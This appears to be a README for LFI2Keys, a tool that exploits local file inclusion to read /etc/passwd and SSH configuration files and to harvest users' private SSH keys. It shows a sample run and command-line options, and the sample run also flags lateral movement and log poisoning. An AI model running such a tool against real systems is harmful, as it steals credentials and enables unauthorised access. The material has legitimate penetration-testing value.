Found a local file inclusion or path traversal vulnerability? Automate the extraction of private SSH keys with LFI2Keys. It uses the exposed /etc/passwd
file to extract valid users, checks for SSH keys, and gathers useful SSH configuration details.
Provide the full URL of the vulnerable endpoint where you can read the /etc/passwd
file, and supply a private key wordlist. Use the -v
parameter for verbose output and for printing the found private key.
┌──(kali㉿DC07 | 2025-02-12 00:13:37)-[~]
└─$ python3 -u -l ssh-priv-key-loot-common.txt -a -o keys.txt
_ ___ ___ ___ _ _______ _____
| | | __|_ _|_ ) |/ / __\ \ / / __|
| |__| _| | | / /| <| _| \ V /\__ \
|____|_| |___/___|_|\_\___| |_| |___/
LFI to SSH Private Keys - Automated Looting Script
[*] The script provided is for educational purposes only, I am not responsible for your actions.
[+] Valid /etc/passwd file found
[+] Valid users exported:
root -> /root (UID: 0)
miranda -> /home/miranda (UID: 1001)
steven -> /home/steven (UID: 1002)
mark -> /home/mark (UID: 1003)
nick -> /home/nick (UID: 1004)
[+] /etc/ssh/sshd_config file found
PermitRootLogin: disabled
PubkeyAuthentication: enabled
PasswordAuthentication: disabled
ChallengeResponseAuthentication: disabled
[+] Checking for SSH metadata (authorized_keys, known_hosts and .ssh/config)...
[!] Found authorized_keys for nick:
[!] Found authorized_keys.bak for nick:
[!] Found known_hosts for miranda:
[!] SSH config found for mark ( - possible lateral movement
Host: TestServer
User: Thunderdome
Port: 2222
IdentityFile: ~/.ssh/gabber.key
[!] Private key found for mark at:
[+] Starting to FUZZ
[!] Private key found for nick at:
[!] Private key found for steven at:
[+] No accessible SSH keys found for additional directories
[!] Log file found: - this file may be used for log poisoning if writable
[+] Results saved to keys.txt
[+] Done (~ ̄▽ ̄)~
-h, --help show this help message and exit
-u, --url URL LFI URL pointing to /etc/passwd
-l, --list LIST Wordlist containing SSH private key names
-o, --output OUTPUT File to save found private key URLs and contents
-p, --proxy PROXY Proxy URL (e.g.,
-v, --verbose Enable verbose mode for debugging
-a, --all Also search the entire home directory and additional paths
--ignore-403 Continue scanning even if a 403 status code is encountered
--no-rate-limit Disable rate limiting on proxy (for debug/testing purposes)
-c, --continue-on-success
Continue scanning all users for private keys even after a match is found
The script provided is for educational purposes only, I am not responsible for your actions.
- PinoyWH1Z for his SSH private key wordlists.